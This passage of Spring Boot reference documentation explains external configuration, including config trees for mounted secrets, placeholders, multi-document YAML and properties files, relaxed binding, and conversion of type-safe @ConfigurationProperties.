https:\/\/kubernetes.io\/docs\/concepts\/configuration\/secret\/#using-secrets-as-files-from-a-pod[`Secrets`].\n\nThere are two common volume mount patterns that can be used:\n\n. A single file contains a complete set of properties (usually written as YAML).\n. Multiple files are written to a directory tree, with the filename becoming the '`key`' and the contents becoming the '`value`'.\n\nFor the first case, you can import the YAML or Properties file directly using `spring.config.import` as described <<features#features.external-config.files.importing,above>>.\nFor the second case, you need to use the `configtree:` prefix so that Spring Boot knows it needs to expose all the files as properties.\n\nAs an example, let's imagine that Kubernetes has mounted the following volume:\n\n[indent=0]\n----\n\tetc\/\n\t config\/\n\t myapp\/\n\t username\n\t password\n----\n\nThe contents of the `username` file would be a config value, and the contents of `password` would be a secret.\n\nTo import these properties, you can add the following to your `application.properties` or `application.yaml` file:\n\n[source,yaml,indent=0,subs=\"verbatim\",configprops,configblocks]\n----\n\tspring:\n\t config:\n\t import: \"optional:configtree:\/etc\/config\/\"\n----\n\nYou can then access or inject `myapp.username` and `myapp.password` properties from the `Environment` in the usual way.\n\nTIP: The folders under the config tree form the property name.\nIn the above example, to access the properties as `username` and `password`, you can set `spring.config.import` to `optional:configtree:\/etc\/config\/myapp`.\n\nNOTE: Filenames with dot notation are also correctly mapped.\nFor example, in the above example, a file named `myapp.username` in `\/etc\/config` would result in a `myapp.username` property in the `Environment`.\n\nTIP: Configuration tree values can be bound to both string `String` and `byte[]` types depending on the contents expected.\n\nIf you have multiple config trees to import from the same parent folder you can use a wildcard shortcut.\nAny `configtree:` location that ends with `\/*\/` will import all immediate children as config trees.\n\nFor example, given the following volume:\n\n[indent=0]\n----\n\tetc\/\n\t config\/\n\t dbconfig\/\n\t db\/\n\t username\n\t password\n\t mqconfig\/\n\t mq\/\n\t username\n\t password\n----\n\nYou can use `configtree:\/etc\/config\/*\/` as the import location:\n\n[source,yaml,indent=0,subs=\"verbatim\",configprops,configblocks]\n----\n\tspring:\n\t config:\n\t import: \"optional:configtree:\/etc\/config\/*\/\"\n----\n\nThis will add `db.username`, `db.password`, `mq.username` and `mq.password` properties.\n\nNOTE: Directories loaded using a wildcard are sorted alphabetically.\nIf you need a different order, then you should list each location as a separate import\n\n\nConfiguration trees can also be used for Docker secrets.\nWhen a Docker swarm service is granted access to a secret, the secret gets mounted into the container.\nFor example, if a secret named `db.password` is mounted at location `\/run\/secrets\/`, you can make `db.password` available to the Spring environment using the following:\n\n[source,yaml,indent=0,subs=\"verbatim\",configprops,configblocks]\n----\n\tspring:\n\t config:\n\t import: \"optional:configtree:\/run\/secrets\/\"\n----\n\n\n\n[[features.external-config.files.property-placeholders]]\n==== Property Placeholders\nThe values in `application.properties` and `application.yml` are filtered through the existing `Environment` when they are used, so you can refer back to previously defined values (for example, from System properties or environment variables).\nThe standard `$\\{name}` property-placeholder syntax can be used anywhere within a value.\nProperty placeholders can also specify a default value using a `:` to separate the default value from the property name, for example `${name:default}`.\n\nThe use of placeholders with and without defaults is shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tapp:\n\t name: \"MyApp\"\n\t description: \"${app.name} is a Spring Boot application written by ${username:Unknown}\"\n----\n\nAssuming that the `username` property has not been set elsewhere, `app.description` will have the value `MyApp is a Spring Boot application written by Unknown`.\n\n[NOTE]\n====\nYou should always refer to property names in the placeholder using their canonical form (kebab-case using only lowercase letters).\nThis will allow Spring Boot to use the same logic as it does when <<features#features.external-config.typesafe-configuration-properties.relaxed-binding, relaxed binding>> `@ConfigurationProperties`.\n\nFor example, `${demo.item-price}` will pick up `demo.item-price` and `demo.itemPrice` forms from the `application.properties` file, as well as `DEMO_ITEMPRICE` from the system environment.\nIf you used `${demo.itemPrice}` instead, `demo.item-price` and `DEMO_ITEMPRICE` would not be considered.\n====\n\nTIP: You can also use this technique to create \"`short`\" variants of existing Spring Boot properties.\nSee the _<<howto#howto.properties-and-configuration.short-command-line-arguments>>_ how-to for details.\n\n\n\n[[features.external-config.files.multi-document]]\n==== Working with Multi-Document Files\nSpring Boot allows you to split a single physical file into multiple logical documents which are each added independently.\nDocuments are processed in order, from top to bottom.\nLater documents can override the properties defined in earlier ones.\n\nFor `application.yml` files, the standard YAML multi-document syntax is used.\nThree consecutive hyphens represent the end of one document, and the start of the next.\n\nFor example, the following file has two logical documents:\n\n[source,yaml,indent=0,subs=\"verbatim\"]\n----\n\tspring:\n\t application:\n\t name: \"MyApp\"\n\t---\n\tspring:\n\t application:\n\t name: \"MyCloudApp\"\n\t config:\n\t activate:\n\t on-cloud-platform: \"kubernetes\"\n----\n\nFor `application.properties` files a special `#---` comment is used to mark the document splits:\n\n[source,properties,indent=0,subs=\"verbatim\"]\n----\n\tspring.application.name=MyApp\n\t#---\n\tspring.application.name=MyCloudApp\n\tspring.config.activate.on-cloud-platform=kubernetes\n----\n\nNOTE: Property file separators must not have any leading whitespace and must have exactly three hyphen characters.\nThe lines immediately before and after the separator must not be comments.\n\nTIP: Multi-document property files are often used in conjunction with activation properties such as `spring.config.activate.on-profile`.\nSee the <<features#features.external-config.files.activation-properties, next section>> for details.\n\nWARNING: Multi-document property files cannot be loaded by using the `@PropertySource` or `@TestPropertySource` annotations.\n\n\n\n[[features.external-config.files.activation-properties]]\n==== Activation Properties\nIt is sometimes useful to only activate a given set of properties when certain conditions are met.\nFor example, you might have properties that are only relevant when a specific profile is active.\n\nYou can conditionally activate a properties document using `spring.config.activate.*`.\n\nThe following activation properties are available:\n\n.activation properties\n[cols=\"1,4\"]\n|===\n| Property | Note\n\n| `on-profile`\n| A profile expression that must match for the document to be active.\n\n| `on-cloud-platform`\n| The `CloudPlatform` that must be detected for the document to be active.\n|===\n\nFor example, the following specifies that the second document is only active when running on Kubernetes, and only when either the \"`prod`\" or \"`staging`\" profiles are active:\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tmyprop:\n\t \"always-set\"\n\t---\n\tspring:\n\t config:\n\t activate:\n\t on-cloud-platform: \"kubernetes\"\n\t on-profile: \"prod | staging\"\n\tmyotherprop: \"sometimes-set\"\n----\n\n\n\n[[features.external-config.encrypting]]\n=== Encrypting Properties\nSpring Boot does not provide any built in support for encrypting property values, however, it does provide the hook points necessary to modify values contained in the Spring `Environment`.\nThe `EnvironmentPostProcessor` interface allows you to manipulate the `Environment` before the application starts.\nSee <<howto#howto.application.customize-the-environment-or-application-context>> for details.\n\nIf you need a secure way to store credentials and passwords, the https:\/\/cloud.spring.io\/spring-cloud-vault\/[Spring Cloud Vault] project provides support for storing externalized configuration in https:\/\/www.vaultproject.io\/[HashiCorp Vault].\n\n\n\n[[features.external-config.yaml]]\n=== Working with YAML\nhttps:\/\/yaml.org[YAML] is a superset of JSON and, as such, is a convenient format for specifying hierarchical configuration data.\nThe `SpringApplication` class automatically supports YAML as an alternative to properties whenever you have the https:\/\/bitbucket.org\/asomov\/snakeyaml[SnakeYAML] library on your classpath.\n\nNOTE: If you use \"`Starters`\", SnakeYAML is automatically provided by `spring-boot-starter`.\n\n\n\n[[features.external-config.yaml.mapping-to-properties]]\n==== Mapping YAML to Properties\nYAML documents need to be converted from their hierarchical format to a flat structure that can be used with the Spring `Environment`.\nFor example, consider the following YAML document:\n\n[source,yaml,indent=0,subs=\"verbatim\"]\n----\n\tenvironments:\n\t dev:\n\t url: \"https:\/\/dev.example.com\"\n\t name: \"Developer Setup\"\n\t prod:\n\t url: \"https:\/\/another.example.com\"\n\t name: \"My Cool App\"\n----\n\nIn order to access these properties from the `Environment`, they would be flattened as follows:\n\n[source,properties,indent=0,subs=\"verbatim\"]\n----\n\tenvironments.dev.url=https:\/\/dev.example.com\n\tenvironments.dev.name=Developer Setup\n\tenvironments.prod.url=https:\/\/another.example.com\n\tenvironments.prod.name=My Cool App\n----\n\nLikewise, YAML lists also need to be flattened.\nThey are represented as property keys with `[index]` dereferencers.\nFor example, consider the following YAML:\n\n[source,yaml,indent=0,subs=\"verbatim\"]\n----\n\t my:\n\t servers:\n\t - \"dev.example.com\"\n\t - \"another.example.com\"\n----\n\nThe preceding example would be transformed into these properties:\n\n[source,properties,indent=0,subs=\"verbatim\"]\n----\n\tmy.servers[0]=dev.example.com\n\tmy.servers[1]=another.example.com\n----\n\nTIP: Properties that use the `[index]` notation can be bound to Java `List` or `Set` objects using Spring Boot's `Binder` class.\nFor more details see the \"`<<features#features.external-config.typesafe-configuration-properties>>`\" section below.\n\nWARNING: YAML files cannot be loaded by using the `@PropertySource` or `@TestPropertySource` annotations.\nSo, in the case that you need to load values that way, you need to use a properties file.\n\n\n\n[[features.external-config.yaml.directly-loading]]\n[[features.external-config.yaml.directly-loading]]\n==== Directly Loading YAML\nSpring Framework provides two convenient classes that can be used to load YAML documents.\nThe `YamlPropertiesFactoryBean` loads YAML as `Properties` and the `YamlMapFactoryBean` loads YAML as a `Map`.\n\nYou can also use the `YamlPropertySourceLoader` class if you want to load YAML as a Spring `PropertySource`.\n\n\n\n[[features.external-config.random-values]]\n=== Configuring Random Values\nThe `RandomValuePropertySource` is useful for injecting random values (for example, into secrets or test cases).\nIt can produce integers, longs, uuids, or strings, as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tmy:\n\t secret: \"${random.value}\"\n\t number: \"${random.int}\"\n\t bignumber: \"${random.long}\"\n\t uuid: \"${random.uuid}\"\n\t number-less-than-ten: \"${random.int(10)}\"\n\t number-in-range: \"${random.int[1024,65536]}\"\n----\n\nThe `+random.int*+` syntax is `OPEN value (,max) CLOSE` where the `OPEN,CLOSE` are any character and `value,max` are integers.\nIf `max` is provided, then `value` is the minimum value and `max` is the maximum value (exclusive).\n\n\n\n[[features.external-config.system-environment]]\n=== Configuring System Environment Properties\nSpring Boot supports setting a prefix for environment properties.\nThis is useful if the system environment is shared by multiple Spring Boot applications with different configuration requirements.\nThe prefix for system environment properties can be set directly on `SpringApplication`.\n\nFor example, if you set the prefix to `input`, a property such as `remote.timeout` will also be resolved as `input.remote.timeout` in the system environment.\n\n\n\n[[features.external-config.typesafe-configuration-properties]]\n=== Type-safe Configuration Properties\nUsing the `@Value(\"$\\{property}\")` annotation to inject configuration properties can sometimes be cumbersome, especially if you are working with multiple properties or your data is hierarchical in nature.\nSpring Boot provides an alternative method of working with properties that lets strongly typed beans govern and validate the configuration of your application.\n\nTIP: See also the <<features#features.external-config.typesafe-configuration-properties.vs-value-annotation,differences between `@Value` and type-safe configuration properties>>.\n\n\n\n[[features.external-config.typesafe-configuration-properties.java-bean-binding]]\n==== JavaBean properties binding\nIt is possible to bind a bean declaring standard JavaBean properties as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/javabeanbinding\/MyProperties.java[]\n----\n\nThe preceding POJO defines the following properties:\n\n* `my.service.enabled`, with a value of `false` by default.\n* `my.service.remote-address`, with a type that can be coerced from `String`.\n* `my.service.security.username`, with a nested \"security\" object whose name is determined by the name of the property.\n In particular, the type is not used at all there and could have been `SecurityProperties`.\n* `my.service.security.password`.\n* `my.service.security.roles`, with a collection of `String` that defaults to `USER`.\n\nNOTE: The properties that map to `@ConfigurationProperties` classes available in Spring Boot, which are configured through properties files, YAML files, environment variables, and other mechanisms, are public API but the accessors (getters\/setters) of the class itself are not meant to be used directly.\n\n[NOTE]\n====\nSuch arrangement relies on a default empty constructor and getters and setters are usually mandatory, since binding is through standard Java Beans property descriptors, just like in Spring MVC.\nA setter may be omitted in the following cases:\n\n* Maps, as long as they are initialized, need a getter but not necessarily a setter, since they can be mutated by the binder.\n* Collections and arrays can be accessed either through an index (typically with YAML) or by using a single comma-separated value (properties).\n In the latter case, a setter is mandatory.\n We recommend to always add a setter for such types.\n If you initialize a collection, make sure it is not immutable (as in the preceding example).\n* If nested POJO properties are initialized (like the `Security` field in the preceding example), a setter is not required.\n If you want the binder to create the instance on the fly by using its default constructor, you need a setter.\n\nSome people use Project Lombok to add getters and setters automatically.\nMake sure that Lombok does not generate any particular constructor for such a type, as it is used automatically by the container to instantiate the object.\n\nFinally, only standard Java Bean properties are considered and binding on static properties is not supported.\n====\n\n\n\n[[features.external-config.typesafe-configuration-properties.constructor-binding]]\n==== Constructor binding\nThe example in the previous section can be rewritten in an immutable fashion as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/constructorbinding\/MyProperties.java[]\n----\n\nIn this setup, the `@ConstructorBinding` annotation is used to indicate that constructor binding should be used.\nThis means that the binder will expect to find a constructor with the parameters that you wish to have bound.\nIf you are using Java 16 or later, constructor binding can be used with records.\nIn this case, unless your record has multiple constructors, there is no need to use `@ConstructorBinding`.\n\nNested members of a `@ConstructorBinding` class (such as `Security` in the example above) will also be bound through their constructor.\n\nDefault values can be specified using `@DefaultValue` on a constructor parameter or, when using Java 16 or later, a record component.\nThe conversion service will be applied to coerce the `String` value to the target type of a missing property.\n\nReferring to the previous example, if no properties are bound to `Security`, the `MyProperties` instance will contain a `null` value for `security`.\nIf you wish you return a non-null instance of `Security` even when no properties are bound to it, you can use an empty `@DefaultValue` annotation to do so:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/constructorbinding\/nonnull\/MyProperties.java[tag=*]\n----\n\n\nNOTE: To use constructor binding the class must be enabled using `@EnableConfigurationProperties` or configuration property scanning.\nYou cannot use constructor binding with beans that are created by the regular Spring mechanisms (for example `@Component` beans, beans created by using `@Bean` methods or beans loaded by using `@Import`)\n\nTIP: If you have more than one constructor for your class you can also use `@ConstructorBinding` directly on the constructor that should be bound.\n\nNOTE: The use of `java.util.Optional` with `@ConfigurationProperties` is not recommended as it is primarily intended for use as a return type.\nAs such, it is not well-suited to configuration property injection.\nFor consistency with properties of other types, if you do declare an `Optional` property and it has no value, `null` rather than an empty `Optional` will be bound.\n\n\n\n[[features.external-config.typesafe-configuration-properties.enabling-annotated-types]]\n==== Enabling @ConfigurationProperties-annotated types\nSpring Boot provides infrastructure to bind `@ConfigurationProperties` types and register them as beans.\nYou can either enable configuration properties on a class-by-class basis or enable configuration property scanning that works in a similar manner to component scanning.\n\nSometimes, classes annotated with `@ConfigurationProperties` might not be suitable for scanning, for example, if you're developing your own auto-configuration or you want to enable them conditionally.\nIn these cases, specify the list of types to process using the `@EnableConfigurationProperties` annotation.\nThis can be done on any `@Configuration` class, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/enablingannotatedtypes\/MyConfiguration.java[]\n----\n\nTo use configuration property scanning, add the `@ConfigurationPropertiesScan` annotation to your application.\nTypically, it is added to the main application class that is annotated with `@SpringBootApplication` but it can be added to any `@Configuration` class.\nBy default, scanning will occur from the package of the class that declares the annotation.\nIf you want to define specific packages to scan, you can do so as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/enablingannotatedtypes\/MyApplication.java[]\n----\n\n[NOTE]\n====\nWhen the `@ConfigurationProperties` bean is registered using configuration property scanning or through `@EnableConfigurationProperties`, the bean has a conventional name: `<prefix>-<fqn>`, where `<prefix>` is the environment key prefix specified in the `@ConfigurationProperties` annotation and `<fqn>` is the fully qualified name of the bean.\nIf the annotation does not provide any prefix, only the fully qualified name of the bean is used.\n\nThe bean name in the example above is `com.example.app-com.example.app.SomeProperties`.\n====\n\nWe recommend that `@ConfigurationProperties` only deal with the environment and, in particular, does not inject other beans from the context.\nFor corner cases, setter injection can be used or any of the `*Aware` interfaces provided by the framework (such as `EnvironmentAware` if you need access to the `Environment`).\nIf you still want to inject other beans using the constructor, the configuration properties bean must be annotated with `@Component` and use JavaBean-based property binding.\n\n\n\n[[features.external-config.typesafe-configuration-properties.using-annotated-types]]\n==== Using @ConfigurationProperties-annotated types\nThis style of configuration works particularly well with the `SpringApplication` external YAML configuration, as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim\"]\n----\n\tmy:\n\t service:\n\t remote-address: 192.168.1.1\n\t security:\n\t username: \"admin\"\n\t roles:\n\t - \"USER\"\n\t - \"ADMIN\"\n----\n\nTo work with `@ConfigurationProperties` beans, you can inject them in the same way as any other bean, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/usingannotatedtypes\/MyService.java[]\n----\n\nTIP: Using `@ConfigurationProperties` also lets you generate metadata files that can be used by IDEs to offer auto-completion for your own keys.\nSee the <<configuration-metadata#appendix.configuration-metadata,appendix>> for details.\n\n\n\n[[features.external-config.typesafe-configuration-properties.third-party-configuration]]\n==== Third-party Configuration\nAs well as using `@ConfigurationProperties` to annotate a class, you can also use it on public `@Bean` methods.\nDoing so can be particularly useful when you want to bind properties to third-party components that are outside of your control.\n\nTo configure a bean from the `Environment` properties, add `@ConfigurationProperties` to its bean registration, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/thirdpartyconfiguration\/ThirdPartyConfiguration.java[]\n----\n\nAny JavaBean property defined with the `another` prefix is mapped onto that `AnotherComponent` bean in manner similar to the preceding `SomeProperties` example.\n\n\n\n[[features.external-config.typesafe-configuration-properties.relaxed-binding]]\n==== Relaxed Binding\nSpring Boot uses some relaxed rules for binding `Environment` properties to `@ConfigurationProperties` beans, so there does not need to be an exact match between the `Environment` property name and the bean property name.\nCommon examples where this is useful include dash-separated environment properties (for example, `context-path` binds to `contextPath`), and capitalized environment properties (for example, `PORT` binds to `port`).\n\nAs an example, consider the following `@ConfigurationProperties` class:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/relaxedbinding\/MyPersonProperties.java[]\n----\n\nWith the preceding code, the following properties names can all be used:\n\n.relaxed binding\n[cols=\"1,4\"]\n|===\n| Property | Note\n\n| `my.main-project.person.first-name`\n| Kebab case, which is recommended for use in `.properties` and `.yml` files.\n\n| `my.main-project.person.firstName`\n| Standard camel case syntax.\n\n| `my.main-project.person.first_name`\n| Underscore notation, which is an alternative format for use in `.properties` and `.yml` files.\n\n| `MY_MAINPROJECT_PERSON_FIRSTNAME`\n| Upper case format, which is recommended when using system environment variables.\n|===\n\nNOTE: The `prefix` value for the annotation _must_ be in kebab case (lowercase and separated by `-`, such as `my.main-project.person`).\n\n.relaxed binding rules per property source\n[cols=\"2,4,4\"]\n|===\n| Property Source | Simple | List\n\n| Properties Files\n| Camel case, kebab case, or underscore notation\n| Standard list syntax using `[ ]` or comma-separated values\n\n| YAML Files\n| Camel case, kebab case, or underscore notation\n| Standard YAML list syntax or comma-separated values\n\n| Environment Variables\n| Upper case format with underscore as the delimiter (see <<features#features.external-config.typesafe-configuration-properties.relaxed-binding.environment-variables>>).\n| Numeric values surrounded by underscores (see <<features#features.external-config.typesafe-configuration-properties.relaxed-binding.environment-variables>>)\n\n| System properties\n| Camel case, kebab case, or underscore notation\n| Standard list syntax using `[ ]` or comma-separated values\n|===\n\nTIP: We recommend that, when possible, properties are stored in lower-case kebab format, such as `my.person.first-name=Rod`.\n\n\n\n[[features.external-config.typesafe-configuration-properties.relaxed-binding.maps]]\n===== Binding Maps\nWhen binding to `Map` properties you may need to use a special bracket notation so that the original `key` value is preserved.\nIf the key is not surrounded by `[]`, any characters that are not alpha-numeric, `-` or `.` are removed.\n\nFor example, consider binding the following properties to a `Map<String,String>`:\n\n\n[source,properties,indent=0,subs=\"verbatim\",role=\"primary\"]\n.Properties\n----\n\tmy.map.[\/key1]=value1\n\tmy.map.[\/key2]=value2\n\tmy.map.\/key3=value3\n----\n\n[source,yaml,indent=0,subs=\"verbatim\",role=\"secondary\"]\n.Yaml\n----\n\tmy:\n\t map:\n\t \"[\/key1]\": \"value1\"\n\t \"[\/key2]\": \"value2\"\n\t \"\/key3\": \"value3\"\n----\n\nNOTE: For YAML files, the brackets need to be surrounded by quotes for the keys to be parsed properly.\n\nThe properties above will bind to a `Map` with `\/key1`, `\/key2` and `key3` as the keys in the map.\nThe slash has been removed from `key3` because it was not surrounded by square brackets.\n\nWhen binding to scalar values, keys with `.` in them do not need to be surrounded by `[]`.\nScalar values include enums and all types in the `java.lang` package except for `Object`.\nBinding `a.b=c` to `Map<String, String>` will preserve the `.` in the key and return a Map with the entry `{\"a.b\"=\"c\"}`.\nFor any other types you need to use the bracket notation if your `key` contains a `.`.\nFor example, binding `a.b=c` to `Map<String, Object>` will return a Map with the entry `{\"a\"={\"b\"=\"c\"}}` whereas `[a.b]=c` will return a Map with the entry `{\"a.b\"=\"c\"}`.\n\n\n\n[[features.external-config.typesafe-configuration-properties.relaxed-binding.environment-variables]]\n===== Binding from Environment Variables\nMost operating systems impose strict rules around the names that can be used for environment variables.\nFor example, Linux shell variables can contain only letters (`a` to `z` or `A` to `Z`), numbers (`0` to `9`) or the underscore character (`_`).\nBy convention, Unix shell variables will also have their names in UPPERCASE.\n\nSpring Boot's relaxed binding rules are, as much as possible, designed to be compatible with these naming restrictions.\n\nTo convert a property name in the canonical-form to an environment variable name you can follow these rules:\n\n* Replace dots (`.`) with underscores (`_`).\n* Remove any dashes (`-`).\n* Convert to uppercase.\n\nFor example, the configuration property `spring.main.log-startup-info` would be an environment variable named `SPRING_MAIN_LOGSTARTUPINFO`.\n\nEnvironment variables can also be used when binding to object lists.\nTo bind to a `List`, the element number should be surrounded with underscores in the variable name.\n\nFor example, the configuration property `my.service[0].other` would use an environment variable named `MY_SERVICE_0_OTHER`.\n\n\n\n[[features.external-config.typesafe-configuration-properties.merging-complex-types]]\n==== Merging Complex Types\nWhen lists are configured in more than one place, overriding works by replacing the entire list.\n\nFor example, assume a `MyPojo` object with `name` and `description` attributes that are `null` by default.\nThe following example exposes a list of `MyPojo` objects from `MyProperties`:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/mergingcomplextypes\/list\/MyProperties.java[]\n----\n\nConsider the following configuration:\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tmy:\n\t list:\n\t - name: \"my name\"\n\t description: \"my description\"\n\t---\n\tspring:\n\t config:\n\t activate:\n\t on-profile: \"dev\"\n\tmy:\n\t list:\n\t - name: \"my another name\"\n----\n\nIf the `dev` profile is not active, `MyProperties.list` contains one `MyPojo` entry, as previously defined.\nIf the `dev` profile is enabled, however, the `list` _still_ contains only one entry (with a name of `my another name` and a description of `null`).\nThis configuration _does not_ add a second `MyPojo` instance to the list, and it does not merge the items.\n\nWhen a `List` is specified in multiple profiles, the one with the highest priority (and only that one) is used.\nConsider the following example:\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tmy:\n\t list:\n\t - name: \"my name\"\n\t description: \"my description\"\n\t - name: \"another name\"\n\t description: \"another description\"\n\t---\n\tspring:\n\t config:\n\t activate:\n\t on-profile: \"dev\"\n\tmy:\n\t list:\n\t - name: \"my another name\"\n----\n\nIn the preceding example, if the `dev` profile is active, `MyProperties.list` contains _one_ `MyPojo` entry (with a name of `my another name` and a description of `null`).\nFor YAML, both comma-separated lists and YAML lists can be used for completely overriding the contents of the list.\n\nFor `Map` properties, you can bind with property values drawn from multiple sources.\nHowever, for the same property in multiple sources, the one with the highest priority is used.\nThe following example exposes a `Map<String, MyPojo>` from `MyProperties`:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/mergingcomplextypes\/map\/MyProperties.java[]\n----\n\nConsider the following configuration:\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tmy:\n\t map:\n\t key1:\n\t name: \"my name 1\"\n\t description: \"my description 1\"\n\t---\n\tspring:\n\t config:\n\t activate:\n\t on-profile: \"dev\"\n\tmy:\n\t map:\n\t key1:\n\t name: \"dev name 1\"\n\t key2:\n\t name: \"dev name 2\"\n\t description: \"dev description 2\"\n----\n\nIf the `dev` profile is not active, `MyProperties.map` contains one entry with key `key1` (with a name of `my name 1` and a description of `my description 1`).\nIf the `dev` profile is enabled, however, `map` contains two entries with keys `key1` (with a name of `dev name 1` and a description of `my description 1`) and `key2` (with a name of `dev name 2` and a description of `dev description 2`).\n\nNOTE: The preceding merging rules apply to properties from all property sources, and not just files.\n\n\n\n[[features.external-config.typesafe-configuration-properties.conversion]]\n==== Properties Conversion\nSpring Boot attempts to coerce the external application properties to the right type when it binds to the `@ConfigurationProperties` beans.\nIf you need custom type conversion, you can provide a `ConversionService` bean (with a bean named `conversionService`) or custom property editors (through a `CustomEditorConfigurer` bean) or custom `Converters` (with bean definitions annotated as `@ConfigurationPropertiesBinding`).\n\nNOTE: As this bean is requested very early during the application lifecycle, make sure to limit the dependencies that your `ConversionService` is using.\nTypically, any dependency that you require may not be fully initialized at creation time.\nYou may want to rename your custom `ConversionService` if it is not required for configuration keys coercion and only rely on custom converters qualified with `@ConfigurationPropertiesBinding`.\n\n\n\n[[features.external-config.typesafe-configuration-properties.conversion.durations]]\n===== Converting Durations\nSpring Boot has dedicated support for expressing durations.\nIf you expose a `java.time.Duration` property, the following formats in application properties are available:\n\n* A regular `long` representation (using milliseconds as the default unit unless a `@DurationUnit` has been specified)\n* The standard ISO-8601 format {java-api}\/java\/time\/Duration.html#parse-java.lang.CharSequence-[used by `java.time.Duration`]\n* A more readable format where the value and the unit are coupled (`10s` means 10 seconds)\n\nConsider the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/conversion\/durations\/javabeanbinding\/MyProperties.java[]\n----\n\nTo specify a session timeout of 30 seconds, `30`, `PT30S` and `30s` are all equivalent.\nA read timeout of 500ms can be specified in any of the following form: `500`, `PT0.5S` and `500ms`.\n\nYou can also use any of the supported units.\nThese are:\n\n* `ns` for nanoseconds\n* `us` for microseconds\n* `ms` for milliseconds\n* `s` for seconds\n* `m` for minutes\n* `h` for hours\n* `d` for days\n\nThe default unit is milliseconds and can be overridden using `@DurationUnit` as illustrated in the sample above.\n\nIf you prefer to use constructor binding, the same properties can be exposed, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/conversion\/durations\/constructorbinding\/MyProperties.java[]\n----\n\n\nTIP: If you are upgrading a `Long` property, make sure to define the unit (using `@DurationUnit`) if it is not milliseconds.\nDoing so gives a transparent upgrade path while supporting a much richer format.\n\n\n\n[[features.external-config.typesafe-configuration-properties.conversion.periods]]\n===== Converting periods\nIn addition to durations, Spring Boot can also work with `java.time.Period` type.\nThe following formats can be used in application properties:\n\n* An regular `int` representation (using days as the default unit unless a `@PeriodUnit` has been specified)\n* The standard ISO-8601 format {java-api}\/java\/time\/Period.html#parse-java.lang.CharSequence-[used by `java.time.Period`]\n* A simpler format where the value and the unit pairs are coupled (`1y3d` means 1 year and 3 days)\n\nThe following units are supported with the simple format:\n\n* `y` for years\n* `m` for months\n* `w` for weeks\n* `d` for days\n\nNOTE: The `java.time.Period` type never actually stores the number of weeks, it is a shortcut that means \"`7 days`\".\n\n\n\n[[features.external-config.typesafe-configuration-properties.conversion.data-sizes]]\n===== Converting Data Sizes\nSpring Framework has a `DataSize` value type that expresses a size in bytes.\nIf you expose a `DataSize` property, the following formats in application properties are available:\n\n* A regular `long` representation (using bytes as the default unit unless a `@DataSizeUnit` has been specified)\n* A more readable format where the value and the unit are coupled (`10MB` means 10 megabytes)\n\nConsider the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/conversion\/datasizes\/javabeanbinding\/MyProperties.java[]\n----\n\nTo specify a buffer size of 10 megabytes, `10` and `10MB` are equivalent.\nA size threshold of 256 bytes can be specified as `256` or `256B`.\n\nYou can also use any of the supported units.\nThese are:\n\n* `B` for bytes\n* `KB` for kilobytes\n* `MB` for megabytes\n* `GB` for gigabytes\n* `TB` for terabytes\n\nThe default unit is bytes and can be overridden using `@DataSizeUnit` as illustrated in the sample above.\n\nIf you prefer to use constructor binding, the same properties can be exposed, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/conversion\/datasizes\/constructorbinding\/MyProperties.java[]\n----\n\nTIP: If you are upgrading a `Long` property, make sure to define the unit (using `@DataSizeUnit`) if it is not bytes.\nDoing so gives a transparent upgrade path while supporting a much richer format.\n\n\n\n[[features.external-config.typesafe-configuration-properties.validation]]\n==== @ConfigurationProperties Validation\nSpring Boot attempts to validate `@ConfigurationProperties` classes whenever they are annotated with Spring's `@Validated` annotation.\nYou can use JSR-303 `javax.validation` constraint annotations directly on your configuration class.\nTo do so, ensure that a compliant JSR-303 implementation is on your classpath and then add constraint annotations to your fields, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/validate\/MyProperties.java[]\n----\n\nTIP: You can also trigger validation by annotating the `@Bean` method that creates the configuration properties with `@Validated`.\n\nTo ensure that validation is always triggered for nested properties, even when no properties are found, the associated field must be annotated with `@Valid`.\nThe following example builds on the preceding `MyProperties` example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/validate\/nested\/MyProperties.java[]\n----\n\nYou can also add a custom Spring `Validator` by creating 